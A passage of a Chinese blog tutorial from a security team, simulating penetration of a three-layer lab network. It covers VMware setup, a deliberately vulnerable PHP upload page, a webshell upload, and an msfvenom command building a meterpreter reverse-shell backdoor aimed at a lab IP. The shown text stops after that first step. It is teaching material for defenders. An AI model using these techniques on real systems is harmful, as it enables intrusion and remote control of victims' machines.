一个实验了解多层内网渗透

本文由锦行安全平台部提供,通过实验模拟三层网络环境,展示攻击者如何进行多层内网渗透。实验涉及MSF、内网转发等技术,包括环境搭建、第一层靶机的PHP上传页面、内网渗透、利用socks4代理进入第二层网络、探测及渗透第二层网络,以及最后通过ms17-010漏洞进入第三层网络并开启远程桌面。通过这个实验,读者可以了解内网横向渗透的过程和防范措施。
摘要由CSDN通过智能技术生成

原创:锦行安全平台部zy
近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

一、实验简介

网络拓扑图

渗透机:win10+kali

第一层靶机 (外网web服务器): Linux

第二场靶机 (内网web服务器): Linux

第三层靶机 (内网办公机) : win7
用三层网络来模拟内外网环境,主要了解MSF、内网转发等

二、环境搭建

1、第一层网络
把渗透机kali和win10网卡1设置选择VMnet1:

靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

2、第二层网络
将第二台靶机linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

3、第三层网络

将靶机win7网卡1设置选择VMnet3:


再配置好各台机器对应IP即可

4、在第一台linux和第二台linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透

第一台linux

第二台linux

三、实验过程

① 第一层靶机
Win10访问http://192.168.85.131/ 直接上传一句话木马

蚁剑连接


进一步做内网渗透,上传msf后门

打开kali msfconsole 输入
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
生成一个名为mshell.elf的msf后门文件

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值